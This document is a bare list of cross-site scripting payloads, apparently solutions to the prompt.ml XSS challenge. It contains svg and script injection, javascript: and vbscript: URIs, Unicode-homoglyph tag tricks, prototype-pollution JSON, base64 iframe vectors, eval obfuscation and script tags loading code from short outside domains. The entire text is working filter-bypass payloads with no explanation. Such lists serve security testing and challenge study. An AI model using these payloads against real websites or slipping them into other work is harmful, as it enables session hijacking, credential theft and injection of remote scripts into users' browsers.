"><svg/onload=prompt(1)>
"onresize=prompt(1)>
<svg/onload=prompt(1) 
<svg><script>prompt&#40;1)<b>
<svg><script>prompt&#40;1)</script>
<script>eval.call`${'prompt\x281)'}`</script>
<script>prompt.call`${1}`</script>
--!><svg/onload=prompt(1)
//prompt.ml%2f@ᄒ.ws/✌
//prompt.ml%2f@⒕₨
"type=image src onerror="prompt(1)
"onresize="prompt(1)
javascript:prompt(1)#{"action":1}
vbscript:prompt(1)#{"action":1}
"><svg/a=#"onload='/*#*/prompt(1)'
31 chars, MSIE specific solution:
"><script x=#"async=#"src="//⒛₨
<p class="comment" title=""><script x="></p>
<p class="comment" title=""async="></p>
<p class="comment" title=""src="//⒛₨"></p>
[U+2028]prompt(1)[U+2028]-->
<ſvg><ſcript/href=//⒕₨>
<ſcript/ſrc=//⒕₨></ſcript>
<ſcript/async/src=//⒛₨>
p'rompt(1)
"(prompt(1))in"
<script>                                    
    var data = {"action":"login","message":"Welcome back, "(prompt(1))in"."};          
    if (data.action === "login")            
        document.write(data.message)        
</script>
eval(630038579..toString(30))(1)
eval(0x258da033.toString(30))(1)
for((i)in(self))eval(i)(1)
{"source":"_-_invalid-URL_-_","__proto__":{"source":"$`onerror=prompt(1)>"}}
{"source":{},"__proto__":{"source":"$`onerror=prompt(1)>"}}
<SCRIPT /
SRC     =HTTPS:PMT1.ML>    </SCRIPT    <>
"><IFRAME/SRC="x:text/html;base64,ICA8U0NSSVBUIC8KU1JDCSA9SFRUUFM6UE1UMS5NTD4JPC9TQ1JJUFQJPD4=
"><script/async/src="/〳⒛₨
<img src=""><SCRIPT/ASYNC/SRC="/〳⒛₨">
"><svg><!--#--><script><!--#-->prompt(1<!--#-->)</script>
"><svg><!--#--><script><!--#-->prompt(1)</
"><script>`#${prompt(1)}#`</script>
